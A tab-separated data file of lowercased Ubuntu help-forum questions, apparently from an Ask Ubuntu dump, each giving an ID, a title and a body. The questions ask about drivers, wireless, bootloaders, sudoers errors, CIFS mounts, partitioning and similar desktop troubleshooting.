107418	sudoers issue , worth format ?	hi guys i have meerkat and i must have messed sudoers . this is my situation now . ubuntu : /etc $ ifconfig command 'ifconfig ' is available in '/sbin/ifconfig ' the command could not be located because '/sbin ' is not included in the path environment variable . this is most likely caused by the lack of administrative privileges associated with your user account . ifconfig : command not found @ ubuntu : /etc $ ^c @ ubuntu : /etc $ htop @ ubuntu : /etc $ ls -l /etc/environment -rw-r -- r -- 1 root root 79 feb 15 09:54 /etc/environment @ ubuntu : /etc $ cd /etc/environment -bash : cd : /etc/environment : not a directory @ ubuntu : /etc $ sudo nano /etc/environment > > > /etc/sudoers : syntax error near line 17 < < < sudo : parse error in /etc/sudoers near line 17 sudo : no valid sudoers sources found , quitting what would you recommend ?
107429	my nvidia driver disappears after installing and restart ?	when i first installed ubuntu 11.10 as a dual boot with windows 7 on my acer laptop , i could select to install my nvidia geforce gt540m - i did so and restarted my laptop as asked . however , now when i look at my drivers , i see the following : http : //s7.postimage.org/w6trnelnd/screenshot_at_2012_02_24_21_15_41.png is this supposed to happen , has anybody else had this ?
107430	python corrupted : how do i clean a failed install or reinstall a fresh instance ?	i was given wrong advice to install deepin software center on ubuntu 10.04.3 . i learned later that this app was not built for ubuntu 10.x , but for 11.x . the developer has not helped at all with any troubleshooting.the person who recommended for me to install it has also been unable to help me resolve the problem , apart from providing a generic apt-get purge < package > command , which did n't work . deepin software center initially screwed up my installation/updating procedures . i managed to purge all instances of the deepin software center , from disc , except in python , which still retains information on an unable-to-be completed deepin install , and tries valiantly every time i update a package , to complete it . how can i purge this unfinished install information from python ? alternatively , can i simply download a fresh instance of python , & overwrite the corrupted one ? if so , please advise on the steps necessary to do this . i 'm happy to reinstall python , if it clears the residual problem .. all help most gratefully appreciated
107439	how do i make a command that executes a program when a custom hotkey is pressed ?	how do i make a command that executes a program when a custom hotkey is pressed ? are there any good tutorials on how the command / terminal system works in ubuntu ? i want to know how ( using the terminal ) i can run libreoffice or any other program for that matter . thank you very much for any info you can assist me with . lol sorry if these are such noob questions .
107440	how to check what bootloader my system is using ?	how to check what bootloader my system is using ? such as lilo or grub or grub2 . how can i check it ?
107442	orca screen reader	i tried to run 11.10 on my desktop , and could n't get orca screen reader to read desktop screen without using the mouse . my wife is totally blind and has trouble using the mouse to find icons . switched back to 11.04 with classic gnome desktop for which orca works fine . she just has to right-click with the mouse and orca works great after that , but this does n't work with 11.10 . is it going to work in 12.04 when it comes out . i would like to upgrade but ca n't unless we can get a screen reader that will work right .
107444	how to rotate background images in gnome-terminal	i have an image i use as a background while using the terminal . i would like to know if there is a way for a selected few images can be rotated when using the terminal . not like a moving screen-saver , more like a rotating desktop background .
107445	how do i share files between my ubuntu host and xp pro virtual machine ?	i 'm using virtualbox 4.1.8 to run windows xp pro . i have ironed out all other kinks on my own but i still ca n't access a file share . the sole purpose of running a vm is to get itunes for my iphone but i ca n't get to my music file from my guest os , i 'm also new to ubuntu so im not sure if i have done all the updates right or not , any would be welcome
107448	how do i daemonify my daemon ?	as part of the ubuntu accomplishments system i have a daemon that runs as well as a client that connects to it . the daemon is written in python ( using twisted ) and provides a dbus service and a means of processing requests from the clients . right now the daemon is just a program i run before i run the client and it sets up the dbus service and provides an api that can be used by the clients . i want to transform this into something that can be installed and run as a system service for the user 's session ( e.g . starting on boot ) and providing a means to start and stop it etc . the problem is , i am not sure what i need to do to properly daemonify it so it can run as this service . i wanted to ask if others can provide some guidance . some things i need to ask : how can i treat it as a service that is run for the current user service ( not a system service right now ) ? how do i ensure i can start , stop , and restart this session service ? when packaging this , how do i ensure that it installs it as a service for the user 's session and is started on login etc ? in responding , if you can point me to specific examples or solutions i need to implement , that would be helpful . : - ) thanks !
107449	recomended update manager settings	what is the recommended update manager settings for a newbie in ubuntu ? . 多software sources configuration ? 多recommended updates are useful and not problematic ? update weekly or daily
107453	why is my country/city not acknowledged in the clock location selection ?	i just found out as a fresh ubuntu user , that apparently i do n't live in israel , according to the clock 's location i live in `` mikveh israel '' ... what the h ? ! i live in the state of israel and as far as i am aware of , that 's it 's name . i am very surprised to see this kind of misinformation in such a well built system and grand community and it would be only reasonable to fix this mistake . any one can explain that to me ?
107454	sliding workspaces	i only recently started using ubuntu a few days ago ( 11.10 ) , so sorry if i fail to mention specific things that may help someone answer me . that 's probably why this is going to come out wordy . i have a dell inspiron 1501 laptop , and i 've been looking around to see if there was a way for me to install the graphics driver ( ati igp xpress 1150 ) so i could use unity 3d . i was n't sure if i was actually already running it , but i wanted to see if i could enable my graphics driver anyway . as far as i knew , doing that would make things run smoother . i followed the instructions someone placed here : jockey not detecting my ati igp xpress 1150 and it installed ... something . things were still working fine after i did that , so i went into compiz to see what kind of things i could tweek . i do n't recall what the last thing i tried to enable was ( it might have been desktop cube ) but right after that , all the windows i had open lost their bars ( forget the word for it , but you know the bar that has the minimize , restore and close buttons on it ) , the launcher disappeared , even the taskbar . so i restarted my laptop , and now the workspace switcher , instead of a square that showed each workspace and allowed me to move up and down as well as left and right , is replaced with a straight rectangle that only allows me to move left and right ( still with four workspaces ) . i had only seen that before when i ran unity 2d as a test , but i know i 'm not using 2d , and i 'd like to go back . for what it 's worth , i do n't think it really had anything to do with me attempting to install the driver . as things are now , things are moving less laggy on my screen . but i really liked the way the workspace switcher had worked up until now . i think it was something in compiz that i accidentally disabled for something else , but i 'm not sure where to begin to rectify that .
107456	what 's the fairest way to monitor total cpu time - per user ?	on a multi user system , i want to measure each user 's cpu usage in seconds of cpu time . for the purpose of this measurement , i assume that if a pid belongs to a user , this user is causing the cpu time - that is i 'm ignoring daemons and the kernel . currently i 'm doing this , every five seconds : get each user and the pids they are running via ps aux for each pid , get x , the sum of utime , cutime , stime and cstime from /proc/ [ pid ] /stat calculate t = x / interval ( interval is n't always exactly 5 seconds when there 's high load ) if i run this , i get sensible looking values . for instance : a user on this system was spinning in python ( while true : pass ) , and the system was showing round about 750 milliseconds of cpu time per second . when the system hung for a bit , it reported 1600ms for one 1-second inverval . which seems about right , but i undestand that these values can be deceiptful , especially given i do n't really understand them . so my question is this : what is a fair and correct way to measure cpu load on a per-user basis ? the method has to be rather accurate . there might be many hundreds of users on this system , so extracting percentages from ps aux will not be accurate enough , especially for short-lived threads which many pieces of software like to spawn . while this might be complicated , i absolutely know it 's possible . this was my starting point : the kernel keeps track of a processes creation time as well as the cpu time that it consumes during its lifetime . each clock tick , the kernel updates the amount of time in jiffies that the current process has spent in system and in user mode . â ( from the linux documentation project ) the value i 'm after is the amount of seconds ( or jiffies ) that a user has spend on the cpu , not a percentage of system load or cpu usage . it 's important that we measure cpu time while the processes are still running . some processes will only last for half a second , some will last for many months - and we need to catch both sorts , so that we can account for users ' cpu time with fine granularity .
107468	is there a dictionary feature in vim	i use vim for pretty much all my typing work . i was wondering if there was a feature that would use an offline dictionary and whenever i typed : def ubuntu it would give me the definition of the requested word in a new buffer , or something similar .
107469	uninstalling ubuntu from one hard drive and installing on another	i currently have ubuntu installed on a hard drive which already had windows and now i 've installed a slave drive i was wondering how to remove or at least move ubuntu onto the other drive so one drive is windows and the other is windows xp
107470	how can i check how much space there is left on wubi versus how much space it takes on my hdd ?	using 11.10 for the record . it would be easiest to do it on the terminal .
107475	nvidia optimus geforce gt 540m not recognised as a proprietary driver	i have no idea what i 'm doing wrong , when i first install ubuntu 11.10 as a dual boot on my acer aspire 5750g laptop , i could select my additional driver , my nvidia graphics card and i got informed to reboot . i did this and now i get presented with the following : i 've been looking around for a good day trying to find a solution , i 'm new to ubuntu . thank you in advance for any help .
107479	whenever i try to log my facebook account in empathy i get a message saying `` authentication failed ''	i 'm sure my username and passwords are right . do n't know what 's wrong , i could login with my google talk account . has this happened to anyone or do you know how to solve it ? thanks !
107481	drop down terminal as smooth as gnome-shell 's 'looking glass '	is there a drop down terminal as smooth as gnome-shell 's 'looking glass ' that has a normal bash shell ? gnome-shell 's looking glass ( alt+f2 then lg then enter ) is so smooth . i 'd like to see a simple gnome-terminal session in a drop down that smooth . i know you can smooth drop down tilda , but , well , it flashes and it 's not that smooth . i dislike guake 's excessive ui chrome and yukake is outta place . any other solutions ? has anyone taken the 'looking glass ' code and baked a gnome-terminal into it ?
107486	how to know the version of grub	how can i see the version of grub that is running in a particular ubuntu version . a terminal command that can tell me .
107502	all files locked	all of my files and folders have become locked ! i cant run anything from terminal requiring files because it says permission denied and i have to open all files from root if i want to do anything with them . please help : o oh and my themes dont work so im assuming its because they are locked too : /
107505	can ubuntu be installed from a dvd ?	when installing ubuntu am i gon na put it on a cd or dvd-r ? i know the site said cd but i was told to buy dvd-r to back up windows so i was kinda hoping i can use a dvd-r to install ubuntu .
107507	how do i configure what fonts are used for japanese characters ?	i would like to know how i can control which fonts are used for rendering japanese characters . also , i would like to know if there is anything special i need to do to control what fonts are used for japanese characters in java applications . thanks !
107518	where does zsnes save the quicksaves	i downloaded zsnes and did a quicksave but i am moving to another pc . where does zsnes by default store the quicksave files . i ca n't find them .
107527	wireless problem on hp pavilion g6	i have a broadcom wireless card in my laptop and the wireless is not working correctly . right in front of the router the wireless signal is 70 % and across the room it barely works and in another room it disconnects . i have the drivers and everything . i am running ubuntu 11.10 64bit . it works perfectly in windows 7 . can anyone help ? 00:00.0 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1705 ] 00:01.0 vga compatible controller [ 0300 ] : ati technologies inc device [ 1002:9649 ] 00:01.1 audio device [ 0403 ] : ati technologies inc device [ 1002:1714 ] kernel driver in use : hda intel kernel modules : snd-hda-intel 00:04.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] device [ 1022:1709 ] kernel driver in use : pcieport kernel modules : shpchp 00:11.0 sata controller [ 0106 ] : advanced micro devices [ amd ] device [ 1022:7804 ] kernel driver in use : ahci kernel modules : ahci 00:12.0 usb controller [ 0c03 ] : advanced micro devices [ amd ] device [ 1022:7807 ] ( rev 11 ) kernel driver in use : ohci_hcd 00:12.2 usb controller [ 0c03 ] : advanced micro devices [ amd ] device [ 1022:7808 ] ( rev 11 ) kernel driver in use : ehci_hcd 00:13.0 usb controller [ 0c03 ] : advanced micro devices [ amd ] device [ 1022:7807 ] ( rev 11 ) kernel driver in use : ohci_hcd 00:13.2 usb controller [ 0c03 ] : advanced micro devices [ amd ] device [ 1022:7808 ] ( rev 11 ) kernel driver in use : ehci_hcd 00:14.0 smbus [ 0c05 ] : advanced micro devices [ amd ] device [ 1022:780b ] ( rev 13 ) kernel modules : i2c-piix4 00:14.2 audio device [ 0403 ] : advanced micro devices [ amd ] device [ 1022:780d ] ( rev 01 ) kernel driver in use : hda intel kernel modules : snd-hda-intel 00:14.3 isa bridge [ 0601 ] : advanced micro devices [ amd ] device [ 1022:780e ] ( rev 11 ) 00:14.4 pci bridge [ 0604 ] : advanced micro devices [ amd ] device [ 1022:780f ] ( rev 40 ) 00:15.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] device [ 1022:43a0 ] kernel driver in use : pcieport kernel modules : shpchp 00:15.1 pci bridge [ 0604 ] : advanced micro devices [ amd ] device [ 1022:43a1 ] kernel driver in use : pcieport kernel modules : shpchp 00:15.2 pci bridge [ 0604 ] : advanced micro devices [ amd ] device [ 1022:43a2 ] kernel driver in use : pcieport kernel modules : shpchp 00:18.0 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1700 ] ( rev 43 ) 00:18.1 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1701 ] 00:18.2 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1702 ] 00:18.3 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1703 ] 00:18.4 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1704 ] 00:18.5 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1718 ] 00:18.6 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1716 ] 00:18.7 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1719 ] 01:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) kernel driver in use : r8169 kernel modules : r8169 07:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4727 ] ( rev 01 ) kernel driver in use : wl kernel modules : wl 08:00.0 class [ ff00 ] : realtek semiconductor co. , ltd. device [ 10ec:5209 ] ( rev 01 )
107528	how to enable bluetooth on my lifebook lh531 ?	i have lifebook lh531 . it says bluetooth adapter not installed . how do i enable bluetooh on this machine . it has a sticker `` bluetooth '' i am using ubuntu 11.10 and do `` hcitool dev '' it gives nothing at the prompt . sudo commands starts and restarts the bluetooth . no indication on the panel
107529	how do i get my pc to add my av receiver to it so i can use it for sound ouput ?	how do i get my pc to add my av receiver to it so i can use it for sound ouput ? i am trying to get sound from my pc that is connected to my av receiver . do i need to load a driver or something ? i have av receiver and my pc in connected to it using hdmi and av receiver to tv hdmi . i am not getting sound out of my pc to my av receiver but video is getting to tv .
107536	i cant burn the download to disk	i 'm running windows xp , and i have ubuntu 9.1 also . i tried to upgrade to the 10 lts but i did n't have enough disk space . so i came to ubuntu website and downloaded the newest version 11 now i have this zip file 697 megs i unzipped it and got a lot of folders and files . i tried to burn a disk so i could run the programs , it did n't work . then i found that i need to use infrarecorder . it will only let me choose one program . i tried to choose all the programs . then i just started with the first one and copied it to the disk , and when i tried to copy the second file , it said the disk was full already , the first one was only like 2k ? ! so i just lost two cdr 's what am i doing wrong and how can i make a disk ? for real the instructions on the website i followed . it does n't say any more
107537	perl script permissions	i 'm having a few problems with running a perl script . every time i try to run it ( its from a runescape launcher client ) , it give me the following message in terminal : permission denied how can i fix this ?
107538	how do i set up a dual boot with windows and ubuntu ?	i currently have windows 7 on my computer and i want to install ubuntu alongside windows safely . could someone please provide a good tutorial ? thanks !
107543	11.10 , get purple screen , hybrid graphics related ?	after spending countless hours ( patience running ) , i am now at a loss . i freshly wubi installed 11.10 , optimized it with almost everything running perfectly . did several reboots , in between windows and ubuntu . today , it wo n't boot into ubuntu and the splash page does n't pop up . background : samsung series 7 , i7 and ati 6750m card . i installed the prop/ati drivers for the video card manually , so fglrx is there . not open-source drivers . symptoms : will get into grub by holding shift the kernel that i upgraded to 3.2.2ish ? wo n't boot past 'loading initial ramdisk ... ' when i try older kernels ( 3.2.0-generic-.12 or something like that , default kernel ) , the whole thing just hangs and becomes unresponsive . nothing works , no keyboard , fan turns off , ca n't power off with the button , and r e s i u o does n't work . i just have to let the battery run down ( battery is behind screws ) and cross my fingers that the cpu does n't melt into a $ 1300 brick . i want to say it 's related to hybrid graphics , but i honestly have no clue what 's going on . i am entirely frustrated , after 4 reinstall attempts and thinking it was finally working right . i 'm a relative linux newbie , so i do n't know what to do in grub to trouble shoot . is there anything i can do in grub to make sure it 's not a driver issue . is it a driver issue ? someone please , desperately , help me , before i punt kick this thing back to the microsoft store .
107555	server 11.10 only using 31 % of my ram	i have a server 11.10 installed and it seems like no matter how hard my server is working it only uses the first 5gb of ram out of 16 but is still using some swap space . all the memory shows up , it just does n't get use
107560	how to change a users username without the gui	i am using xubuntu 11.10 and trying to change a users username . there does n't seem to be a way to change this through the gui in xubuntu , so i am wondering if there is a way to do it without the gui . maybe changing the setting in a config file . any help would be greatly appreciated .
107563	changing console font on ubuntu 10.04 server	how can i change local console font on ubuntu 10.04 server to inconsolata ?
107567	amd dual-core processor c-50 , amd radeon hd 6250 graphics not support in ubuntu 11.10	failed install ati/amd proprietary fglax graphics driver ( post-release update ) from additional drivers .
107576	connecting to msp430 via /dev/ttyacm0	i 'd like some suggestions about how to fix garbled serial output from a device connected on /dev/ttyacm0 . lately i 've been working on a development project making use of ti 's msp430 microcontroller ( specifically the ez430-rf2560 ) . over on this thread you can see we 've been testing some code and have found that the output of the microcontroller over serial is garbled . the btstack provides simple counter test program . when we run the program and look at the serial port output using putty on windows 7 we see : rfcomm_send_internal cid 117 does n't exist ! btstack counter 26230 rfcomm_send_internal cid 117 does n't exist ! btstack counter 26231 however if we connect from various ubuntu clients we get something like : stt.r . btacn 0 btacn 002btacn 0 btcct 04bttacoe 5btacun my current belief is that this is because the device is being detected by cdc_acm as a generic usb acm device . another thread about a similar microcontroller suggests that the device should use a specific usb serial driver . we 've verified that the module is compiled on our system and did a `` modprobe ti_usb_3410_5052 '' but this had no effect on cdc_acm . here is the relevant section of the kernel 's debug log : [ 2735.092987 ] usb 2-1.2 : new full speed usb device number 5 using ehci_hcd [ 2735.213655 ] cdc_acm 2-1.2:1.0 : this device can not do calls on its own . it is not a modem . [ 2735.213669 ] cdc_acm 2-1.2:1.0 : no union descriptor , testing for castrated device [ 2735.213720 ] cdc_acm 2-1.2:1.0 : ttyacm0 : usb acm device [ 2745.241996 ] generic-usb 0003:0451 : f432.0003 : usb_submit_urb ( ctrl ) failed [ 2745.242023 ] generic-usb 0003:0451 : f432.0003 : timeout initializing reports [ 2745.242401 ] generic-usb 0003:0451 : f432.0003 : hiddev0 , hidraw0 : usb hid v1.01 device [ texas instruments texas instruments msp-fet430uif ] on usb-0000:00:1d.0-1.2/input1 so , in summary , we 'd like to figure out how to properly connect to this device . also of use may be the appropriate place to file a bug report .
107583	how can i remove duplicate second unity launcher on a dual screen setup ?	see attached image . on my dual screen display i have a unity launcher on the left hand screen and also on the right hand screen . both work perfectly fine . i do n't want two unity launchers . every time i move my mouse to the right hand side it gets slowed down over the right launcher hampering my productivity . i have an nvidia card with the nvidia driver and i am using twinview . could somebody please tell me how to remove this extra duplicated launcher ?
107584	shotwell , grouping photos by folder possible ?	shotwell lists photos based on when they were taken . while this is fine for single-day `` trips '' ( ie saturday at the park ) it is awefull for photos taken in a lengthy trips ( ie my month in italy ) as each day would be an entry on the left panel instead a group . having over 30k photos organized in directories , is there any way shotwell will keep my photo structure and create one event per folder ?
107588	wubi boot problem	please tell me how to uninstall it without effecting windows 7 . i tried wubi but it did n't start up after the first boot up . on the second boot up option came up to select ubuntu or windows 7 . i choose ubuntu but only logo appeared and then after that blank black screen nothing else . so i uninstalled wubi . tell me the reason ? ? my processor is intel i3 64bit but wubi went to download for amd 64bit . did it created the problem ?
107589	difference between -generic and -i386 kernel images	the regular auto-update installs the -generic linux image on my machine intel core i3 machine . is it better to use -i386 kernel ? what kind of machines -generic linux image supports ? the comment # 5 at https : //bugs.launchpad.net/ubuntu/+bug/88693 is about the opengl applications are become faster on -i386 kernel instead of -generic images . is it as expected ?
107595	lenovo onekey recovery system on ubuntu	i am always confused whether to use ubuntu/win . this time as my hdd had some factory problems , lenovo replace it for free . so , i have a fresh new hdd on which i would like to use ubuntu ( i did have some hands-on experience on ubuntu for 1 yr ) . but i am worried whether the special features of lenovo would work in it as i did n't get drivers for linux when i brought my laptop . neither they are present in the website . i use lenovo g570 . does the one key recovery system work in ubuntu and how do i install it ?
107598	how do i get wireless to work on a asus zenbook ux31 ( e ) ?	i have a new asus zenbook ux31e . one instant problem that i have run into is that there does n't seem to be a way to get wifi working out of the box using an ubuntu 11.10 live usb stick which has kernel 3.0.00-12 ( it does work when i try with fedora 16 and with opensuse 12.1 ) . here is some relevant output : nm-tool networkmanager tool state : disconnected - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : unavailable default : no hw address : 01:08 : ca:87:2f : d5 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points lshw -c network *-network disabled description : wireless interface product : ar9485 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 01:08 : ca:87:2f : d5 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.0.0-12-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : dea00000-dea7ffff memory : dea80000-dea8ffff rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no iwconfig wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lsmod | grep ath9 ath9k 112711 0 mac80211 272785 1 ath9k ath9k_common 13599 1 ath9k ath9k_hw 293893 2 ath9k , ath9k_common ath 19387 2 ath9k , ath9k_hw cfg80211 172392 3 ath9k , mac80211 , ath the problem is that ethernet is n't working either ( the laptop uses a special adapter ) , so instruction on how to fix this will likely involve putting .deb packages on usb sticks .
107599	best disk partition for normal users	i have a new clean hdd in my laptop on which i want to install ubuntu 11.10 . so , as i have very less ( in fact nothing ) knowledge on linux file system hierarchy , i thought some would be helping me to choose the best one . here is what i briefly do on ubuntu . learn programming ( should maintain my project files ) # i am a student . ( sometimes , i had to install few external packages too . though they never were more than 200 mb each ) i use software 's like matlab , netbeans , eclipse etc . store lots of music , movies , photos i have a good set of ebooks , office documents ( includes documentations of packages ) . download many files.. this is what a normal user would probably do . what i am actually searching for is that , how do i maintain all those file if i have created only 2 partitions `` / '' and `` /home '' . of course , all of these would come under `` /home '' . would n't they look messy ? ? i windows , i could create 4 partitions , each of them i use for different purposes . actually , i have gone through ubuntu linux file system hierarchy and got to know that each directory has some special significance . thus each directory should be used for their respective purposes ( as recommended ) . so , i want to know how should i partition my hdd and what directories should i mount them to those partitions and what kind of files should i place in them .
107602	command last does not show logins through sftp , is there something similar or any logs ?	when i run last i get something like : user pts/0 user.domain.provider sat feb 25 11:44 still logged in user pts/0 user.domain.provider thu feb 23 16:38 - 16:39 ( 00:00 ) ... but if i connect to the server with sftp , this wo n't show up in this list . are there any other logs or a different command ?
107607	is ext4 stable on 11.10 ?	i have seen that ubuntu 11.10 is offering ext4 as default file system . as i have googled some time on ext4 and found that ext3 is quite stable that ext4 as it still has some bugs . even the ubuntu documentation is referring ext3 . link so , i would like to know whether ext4 is currently stable on 11.10 or not than ext3
107611	how to make an app start with a lower 'nice ' value	i would like to know how to make a program ( eclipse ) always start with a lower 'nice ' value . i tried to manipulate ‘/usr/share/applications/eclipse.desktop’ - with no success . exec='nice -n -10 eclipse' here is the solution as described by 'geirha ' : step 1 - allow user to run nice on eclipse as root : editor=nano visudo -f /etc/sudoers.d/local_changes # last row must always be empty ! # allow certain users to change 'nice ' values user_alias nice_users = user_name1 , user_name2 ... cmnd_alias set_eclipse_nice = /root/eclips_nice.sh nice_users all = nopasswd : set_eclipse_nice step 2 - create the script that launches eclipse with nice -10 : nano /root/eclips_nice.sh # ! /bin/bash nice -n -10 sudo -h -u `` $ 1 '' eclipse exit chmod u+x /root/eclips_nice.sh step 3 - edit eclipse launcher : nano /usr/share/applications/eclipse.desktop change exec to : exec=sh -c 'gksudo -- /root/eclips_nice.sh `` $ user '' '
107612	misaligned partition and other questions	i 've been casually using ubuntu for a few years but this is the first time i 've had real trouble installing the os . i bought a lenovo laptop and i 've run into a few problems after installing : after formatting the drive and installing ubuntu 11.10 ( 64 bit ) the disk utility gives me the message `` the partition is misaligned by 3072 bytes '' and suggests repartitioning . i formatted and reinstalled and am getting the same message . how exactly do i align a partition properly ? the laptop in question has 4 gigs of ram but ubuntu seems to only detect 3.5 . why is this and what can i do to make sure the system uses all four gigs ? when shutting down the laptop hangs at the ubuntu screen . the only way to turn it off is to hold down the power button . also , i 've read that 64 bit ubuntu has issues with flash . is this still the case ? am i better off installing the 32 bit version of 11.10 ? any help with these issues would be much appreciated as i 'm in over my head here .
107615	encrypted ntfs folders and ubuntu	i have about 100 gb folder on a ntfs partition that i would like to make inaccessible in ubuntu . truecrypt is not an option as there 's only 5 gb of free space and there 's no way to create large enough container file to move the file . ubuntu is installed using wubi on the same partition , so i can not disable mounting . with this train of thought i figured that the only option i have is to encrypt the folder using windows properties . so my question is if i do this will ubuntu be able to access the folder . will it be possible to decrypt it in case my windows goes down ? the thing is that i want only one user to be able to access it .
107616	how to make permanent changes to default user-dirs.dirs ?	i am dual booting ubuntu 11.10 and windows 7 so i created a partition where i can store all my documents and open them through both systems . everything seemed like it worked out well , i found out how to change the default locations of documents , videos etc . but whenever i restart my laptop , they reset . this is what my user-dirs.dirs looks like after i 've edited it and it works well with all shortcuts and save locations working correctly : http : //i.stack.imgur.com/l6gwo.png and after a restart , this is what happens to the file : http : //i.stack.imgur.com/nvb7i.png is there any way to make permanent changes to this file ?
107619	how do i install the arduino ide ?	i have an arduino uno , which i need to get working with ubuntu . can somebody explain to me the steps required to install the ide on ubuntu ?
107622	how do i change the display language used for non-unicode programs ?	i was watching english films translated into arabic with a .srt file . it looks like this in ubuntu 11.10 : for some reason , though , it looks like this in windows 8 : so what can i do to see the right translation ?
107623	can virtualbox use external beamer / screens ?	i am going to use ubuntu as my main os . since my university requires to handle a lot of documents in ms office format , i keep a virtual windows 7 with office 2010 . since i dont own a beamer or another screen , i cant be sure if a powerpoint presentation can be shown `` out of '' my virtual windows 7 . given that i wont be able to address a secondary screen , would mirroring still work ?
107626	remapping the altgr key to control with setxkbmap	is there a way to remap the altgr key to ctrl with setxkbmap ? i 've already checked the option section in '' /usr/share/x11/xkb/rules/base.lst '' but i did n't find an entry for altgr ... i also tried xmodmap , however some xmodmap entries on my ~/.xsesssionrc seem to be ignored at system startup , and they do n't take effect . therefore i decided to achieve that through setxkbmap or xkb ... my keyboard layout is set to gb ( on an italian keyboard ) . this is what xmodmap prints : shift shift_l ( 0x32 ) , shift_r ( 0x3e ) lock caps_lock ( 0x42 ) control control_l ( 0x25 ) , control_r ( 0x69 ) mod1 alt_l ( 0x40 ) , meta_l ( 0xcd ) mod2 num_lock ( 0x4d ) mod3 mod4 super_l ( 0x85 ) , super_r ( 0x86 ) , super_l ( 0xce ) , hyper_l ( 0xcf ) mod5 iso_level3_shift ( 0x5c ) , mode_switch ( 0xcb ) and this is what xev prints when i press altgr : ... state 0x90 , keycode 108 ( keysym 0xfe03 , iso_level3_shift ) , same_screen yes , xkeysymtokeycode returns keycode : 92 ... thanks for help .
107627	does hdmi output work on the l502x ?	i would like to add a monitor to my xps 15 l502x but when i connect a monitor using hdmi ubuntu 11.10 does not recognise and i can not extend my display on to that monitor . there are past questions which tend to conclude that this is not possible but they are rather old , i have found some rumblings on the internet that this is now possible but no specific details . is it now possible to get hdmi output working on my l502x ?
107641	how to activate and use f-keys ( f1 , f2 , etc.. ) on a mac book pro laptop-keyboard in gnome-shell 3.2 ?	i am wondering if there is a shortcut or where and how to active the f-keys on a qwertz build-in mbp keyboard . any suggestions ? !
107643	unable to read/write cifs mounts in ubuntu 11.10	i upgraded my laptop from 11.04 too 11.10 and since then the cifs mounts are not working . before the upgrade it would allow mounts on host names , in 11.10 it 's only ip addresses ( not much of an issue ) , however all the shares i mount are as read-only despite the fstab file declaring the options rw and auto . i have chowned the mount point to be nogroup.nouser and it still wont work , here is an extract from my fstab : //192.168.1.1/stories /home/paul/documents/stories cifs rw , user , exec , auto , username= < user > , password= < password > 0 0
107645	problem in install unity theme	i tried to install new themes for unity desktop and i found this topic in search http : //www.omgubuntu.co.uk/2011/03/first-unity-theme-created-available-for-download/ and follow all steps but i faced this problem after write command update ( apt-get update ) get this error w : failed to fetch http : //ppa.launchpad.net/isantop/iansanto-ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . and after command installation this apt-get install unity-theme and faced this problem e : unable to locate package unity-theme what is the reasonř
107649	can not use add-apt-repository due to ssl connection timeout	i 'm using ubuntu 11.10 i386 . please help me . i can not use add-apt-repository : $ sudo add-apt-repository ppa : n-muench/vlc traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 88 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 28 , 'ssl connection timeout at 298976 ' )
107652	good screen recording program	can someone recommend a good program for recording screen activity , and saving it in a popular video format such as h.264 ? i am running ubuntu 11.10 . ( edit ) found the answer to my questions here how to create a screencast ? : )
107655	wireless card soft blocked ath9k	so i 'm a new user to linux and downloaded the wubi installer of 11.10 . unfortunately , it 's been a month and i still can not figure out how to change my wireless soft blocked to no . i can not get online at all and it 's really hindering what i can do with 11.10. any suggestions would be very very much appreciated -johnny
107656	how to extract/mount nero images ( nrg )	i need to extract the content of a nero .nrg image . what can i use since i do not want to burn it .
107665	how do i change java runtime parameters ?	on windows , i could change how much ram java could use by typing something like -xincgc -xmx2048m in the java runtime parameters . how can i do that in ubuntu ?
107666	desktop icon size editing with nautilus	icons on my desktop look very big even after setting the icon view defaults to 50 % in nautilus preferences . please help in fixing this issue ?
107667	how do i know whether my graphic drivers are installed or not	i have installed ubuntu 11.10 on my lenovo laptop and found a `` chip '' image on the top of the screen . it showed me to install 3 drivers ati/amd proprietary fglrx graphics drivers ( post-release updates ) broadcom sta wireless drivers ati/amd proprietary fglrx graphics drivers when i installed 1st one , it showed me some error so , i installed 2nd one it was successful . i went to 3rd and it failed 1st time and later it worked.. after when i came back and found that it is n't not installed . i think these are for my ati radeon graphic drivers but do n't know why its happening . if even found the `` system info '' is n't showing any information about graphics . so , how do i know whether my graphics are installed or not and if not how do i ?
